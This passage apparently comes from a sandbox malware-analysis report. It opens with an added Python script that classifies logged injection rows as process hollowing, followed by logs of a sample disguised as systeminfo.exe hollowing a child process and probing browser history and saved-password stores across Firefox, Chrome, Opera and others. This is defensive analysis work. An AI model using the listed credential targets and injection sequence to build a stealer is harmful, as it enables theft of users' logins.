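"""Classify a VMRay 'Injection Information' row sequence (added example, not VMRay code)."""
import re

SOURCE = "#7: c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe"
TARGET_IMAGE = "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\systeminfo.exe"

# Constructed copy of the four rows printed in the report above:
# (injection type, source process, source thread, injection info).
INJECTION_ROWS = [
    ("Modify Memory", SOURCE, "0x884", "address = 0x400000, size = 102400"),
    ("Modify Memory", SOURCE, "0x884", "address = 0x7efde008, size = 4"),
    ("Modify Memory", SOURCE, "0x884", "address = 0x7efdf010, size = 4"),
    ("Modify Control Flow", SOURCE, "0x884", "os_tid = 0x9e4, address = 0x0"),
]

# Assumption (not stated in the report): Windows 7 x64 WOW64 layout, where the
# 32-bit PEB is at 0x7efde000 (ImageBaseAddress at +0x8) and the 64-bit PEB at
# 0x7efdf000 (ImageBaseAddress at +0x10). Pass your own map for other hosts.
PEB_IMAGEBASE_FIELDS = {
    0x7efde000 + 0x08: "PEB32.ImageBaseAddress",
    0x7efdf000 + 0x10: "PEB64.ImageBaseAddress",
}

_KV = re.compile(r"(\w+) = (0x[0-9a-fA-F]+|\d+)")


def parse_info(info):
    """'address = 0x400000, size = 102400' -> {'address': 4194304, 'size': 102400}."""
    return {k: int(v, 0) for k, v in _KV.findall(info)}


def classify_injection(rows, target_image, peb_fields=PEB_IMAGEBASE_FIELDS,
                       min_image_write=0x1000):
    """Match the row sequence against the process-hollowing pattern:
    a whole image written at an image base, PEB.ImageBaseAddress repointed,
    then the target thread's control flow redirected into the new image."""
    ev = {"image_write": None, "peb_patch": [], "control_flow": None,
          "self_image": False, "verdict": "unclassified"}
    for kind, source, _tid, info in rows:
        f = parse_info(info)
        src_path = source.split(": ", 1)[-1].lower()
        # Source and target sharing one image path is the 'suspended copy of itself' hint.
        ev["self_image"] = ev["self_image"] or src_path == target_image.lower()
        if kind == "Modify Memory":
            # PE image bases are 64 KiB aligned; a write of a page or more there
            # is a mapped image, whereas a 4-byte write at a PEB field is a patch.
            if f["size"] >= min_image_write and f["address"] % 0x10000 == 0:
                ev["image_write"] = (f["address"], f["size"])
            elif f["address"] in peb_fields:
                ev["peb_patch"].append(peb_fields[f["address"]])
        elif kind == "Modify Control Flow":
            ev["control_flow"] = f.get("os_tid")
    if ev["image_write"] and ev["control_flow"] is not None:
        ev["verdict"] = ("process hollowing" if ev["peb_patch"]
                         else "image write + thread hijack (PEB not patched)")
    return ev


if __name__ == "__main__":
    print(classify_injection(INJECTION_ROWS, TARGET_IMAGE))
```

The same logic transfers to an EDR rule: a parent writing to a child's PEB.ImageBaseAddress and then calling into the child's thread context is a signal worth alerting on regardless of which image name the pair borrows.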
Host Behavior
File (3)
Operation Filename Additional Information Success Count
Open STD_INPUT_HANDLE - True 1
Open STD_OUTPUT_HANDLE - True 1
Open STD_ERROR_HANDLE - True 1
Registry (3)
Operation Key Additional Information Success Count
Create Key HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook - True 1
Read Value HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook value_name = DLLPathEx, data = 67 True 1
Read Value HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook value_name = MSIApplicationLCID, data = 77 True 1
Module (40)
Operation Module Additional Information Success Count
Load advapi32.dll base_address = 0x756e0000 True 1
Load ole32.dll base_address = 0x75450000 True 1
Load shell32.dll base_address = 0x75c50000 True 1
Load C:\Program Files\Microsoft Office\Root\Office16\OLMAPI32.DLL base_address = 0x0 False 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x759f0000 True 1
Get Handle mscoree.dll - False 1
Get Filename - process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75a04f2b True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x75a0359f True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75a01252 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75a04208 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75a04d28 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x75a8410b True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x75a84195 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x75a0d31f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x75a1ee7e True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x772b441c True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x772dc50e True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x772dc381 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x75a1f088 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x772c05d7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x772dca24 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77290b8c True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7734fde8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x772e1e1d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x75a84761 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x75a7cd11 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x75a8424f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x75a846b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x75a96676 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x75a84751 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x75a965f1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x75a847c1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x75a847e1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x75a847f1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x75a1eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
System (1)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2017-11-28 18:18:50 (UTC) True 1
Fn
Environment (1)
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Process #10: systeminfo.exe
(Host: 792, Network: 0)
Information Value
ID #10
File Name c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe
Command Line "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" /scomma "C:\ProgramData\FB70.tmp"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:08, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:01:15
OS Process Information
Information Value
PID 0xa98
Parent PID 0x81c (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x964
0x724
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000090000 0x00090000 0x00093fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000000a0000 0x000a0000 0x000a1fff Pagefile Backed Memory Readable True False False
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False
pagefile_0x0000000000120000 0x00120000 0x00120fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000130000 0x00130000 0x00131fff Pagefile Backed Memory Readable True False False
rsaenh.dll 0x00140000 0x0017bfff Memory Mapped File Readable False False False
tzres.dll 0x00140000 0x00140fff Memory Mapped File Readable False False False
private_0x0000000000140000 0x00140000 0x0014ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000140000 0x00140000 0x00148fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000150000 0x00150000 0x00156fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000160000 0x00160000 0x00161fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000170000 0x00170000 0x00178fff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000190000 0x00190000 0x0028ffff Private Memory Readable, Writable True False False
private_0x0000000000290000 0x00290000 0x0038ffff Private Memory Readable, Writable True False False
private_0x00000000003d0000 0x003d0000 0x003dffff Private Memory Readable, Writable True False False
private_0x0000000000400000 0x00400000 0x0045afff Private Memory Readable, Writable, Executable True False False
pagefile_0x0000000000460000 0x00460000 0x005e7fff Pagefile Backed Memory Readable True False False
private_0x0000000000630000 0x00630000 0x006affff Private Memory Readable, Writable True False False
pagefile_0x00000000006b0000 0x006b0000 0x00830fff Pagefile Backed Memory Readable True False False
private_0x0000000000880000 0x00880000 0x0097ffff Private Memory Readable, Writable True False False
private_0x00000000009b0000 0x009b0000 0x009effff Private Memory Readable, Writable True False False
private_0x0000000000a10000 0x00a10000 0x00b0ffff Private Memory Readable, Writable True False False
3292.exe 0x00be0000 0x00bfefff Memory Mapped File Readable, Writable, Executable True False False
pagefile_0x0000000000c00000 0x00c00000 0x01ffffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x02000000 0x022cefff Memory Mapped File Readable False False False
private_0x00000000022d0000 0x022d0000 0x023d0fff Private Memory Readable, Writable True False False
nss3.dll 0x022d0000 0x02481fff Memory Mapped File Readable False False False
nss3.dll 0x022d0000 0x02481fff Memory Mapped File Readable False False False
private_0x00000000022d0000 0x022d0000 0x0240ffff Private Memory Readable, Writable True False False
private_0x00000000022d0000 0x022d0000 0x023cffff Private Memory Readable, Writable True False False
private_0x00000000023d0000 0x023d0000 0x0240ffff Private Memory Readable, Writable True False False
private_0x0000000002410000 0x02410000 0x0251ffff Private Memory Readable, Writable True False False
private_0x0000000002410000 0x02410000 0x0250ffff Private Memory Readable, Writable True False False
private_0x0000000002510000 0x02510000 0x0251ffff Private Memory Readable, Writable True False False
private_0x0000000002520000 0x02520000 0x0271ffff Private Memory Readable, Writable True False False
private_0x0000000002600000 0x02600000 0x026fffff Private Memory Readable, Writable True False False
pagefile_0x0000000002700000 0x02700000 0x02af2fff Pagefile Backed Memory Readable True False False
freebl3.dll 0x73c90000 0x73cdefff Memory Mapped File Readable, Writable, Executable False False False
freebl3.dll 0x73ca0000 0x73ceefff Memory Mapped File Readable, Writable, Executable False False False
softokn3.dll 0x73ce0000 0x73d06fff Memory Mapped File Readable, Writable, Executable False False False
nssdbm3.dll 0x73cf0000 0x73d06fff Memory Mapped File Readable, Writable, Executable False False False
softokn3.dll 0x73d10000 0x73d36fff Memory Mapped File Readable, Writable, Executable False False False
nssdbm3.dll 0x73d20000 0x73d36fff Memory Mapped File Readable, Writable, Executable False False False
msvcp100.dll 0x73d40000 0x73da8fff Memory Mapped File Readable, Writable, Executable False False False
mozglue.dll 0x73db0000 0x73dd1fff Memory Mapped File Readable, Writable, Executable False False False
msvcr100.dll 0x73de0000 0x73e9dfff Memory Mapped File Readable, Writable, Executable False False False
wsock32.dll 0x73ea0000 0x73ea6fff Memory Mapped File Readable, Writable, Executable False False False
nss3.dll 0x73eb0000 0x74064fff Memory Mapped File Readable, Writable, Executable False False False
vaultcli.dll 0x740e0000 0x740ebfff Memory Mapped File Readable, Writable, Executable False False False
atl.dll 0x74130000 0x74143fff Memory Mapped File Readable, Writable, Executable False False False
pstorec.dll 0x74150000 0x7415cfff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x74160000 0x74168fff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x742f0000 0x7448dfff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x746e0000 0x746e7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x746f0000 0x7474bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74750000 0x7478efff Memory Mapped File Readable, Writable, Executable False False False
winmm.dll 0x74860000 0x74891fff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x74b30000 0x74b6afff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x74b70000 0x74b85fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x74eb0000 0x74eb4fff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x74ec0000 0x750bafff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x750c0000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x75350000 0x75444fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x75890000 0x758c4fff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x758d0000 0x759ecfff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
comdlg32.dll 0x75bd0000 0x75c4afff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75c50000 0x76899fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76b60000 0x76beefff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76c40000 0x76d75fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True False False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x77240000 0x77245fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Injection Information
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x8b4 address = 0x400000, size = 372736 True 1
Fn
Data
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x8b4 address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Memory #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x8b4 address = 0x7efdf010, size = 4 True 1
Fn
Data
Modify Control Flow #7: c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe 0x8b4 os_tid = 0x964, address = 0x0 True 1
Fn
Host Behavior
File (639)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110620171113\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017112820171129\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\ProgramData\FB70.tmp desired_access = GENERIC_WRITE, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo_lng.ini type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110620171113\index.dat type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017112820171129\index.dat type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\history.dat type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini type = file_attributes True 1
Fn
Get Info C:\Program Files (x86)\Mozilla Firefox\nss3.dll type = file_attributes True 3
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\logins.json type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite type = file_attributes True 1
Fn
Get Info C:\Program Files (x86)\Mozilla Firefox\sqlite3.dll type = file_attributes False 1
Fn
Get Info C:\Program Files (x86)\Mozilla Firefox\mozsqlite3.dll type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Mozilla\SeaMonkey\profiles.ini type = file_attributes False 1
Fn
Get Info C:\Program Files (x86)\Sea Monkey\nss3.dll type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Crashpad\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Crashpad\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Web Data type = file_attributes True 1
Fn
Get Info - type = size, size_out = 0 True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\Default\Login Data type = file_attributes True 1
Fn
Get Info - type = size, size_out = 0 True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\EVWhitelist\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\EVWhitelist\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\OriginTrials\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\OriginTrials\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\PepperFlash\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\PepperFlash\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\pnacl\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\pnacl\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SwReporter\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\SwReporter\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\WidevineCdm\Web Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Google\Chrome\User Data\WidevineCdm\Login Data type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Apple Computer\Preferences\keychain.plist type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Opera\Opera\wand.dat type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Opera\Opera7\profile\wand.dat type = file_attributes False 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Roaming\Opera Software\Opera Stable\Login Data type = file_attributes False 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 8, size_out = 8 True 51
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 256, size_out = 256 True 89
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat size = 384, size_out = 384 True 5
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110620171113\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017110620171113\index.dat size = 8, size_out = 8 True 93
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017112820171129\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017112820171129\index.dat size = 8, size_out = 8 True 64
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat size = 8, size_out = 8 True 69
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070320170710\index.dat size = 8, size_out = 8 True 93
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat size = 32, size_out = 32 True 1
Fn
Data
Read C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017071220170713\index.dat size = 8, size_out = 8 True 94
Fn
Data
Write C:\ProgramData\FB70.tmp size = 3 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 1 True 8
Fn
Data
Write C:\ProgramData\FB70.tmp size = 11 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 9 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 8 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 17 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 15 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 14 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 12 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 13 True 1
Fn
Data
Write C:\ProgramData\FB70.tmp size = 2 True 1
Fn
Data
Registry (15)
Operation Key Additional Information Success Count Logfile
Open Key Mozilla Firefox\bin - False 3
Fn
Open Key Mozilla Firefox 25.0\bin - True 1
Fn
Open Key Mozilla Firefox 25.0\bin - True 1
Fn
Open Key Mozilla Firefox 25.0\bin - True 1
Fn
Read Value Mozilla Firefox 25.0\bin value_name = PathToExe, data = C:\Program Files (x86)\Mozilla Firefox\firefox.exe, type = REG_SZ True 1
Fn
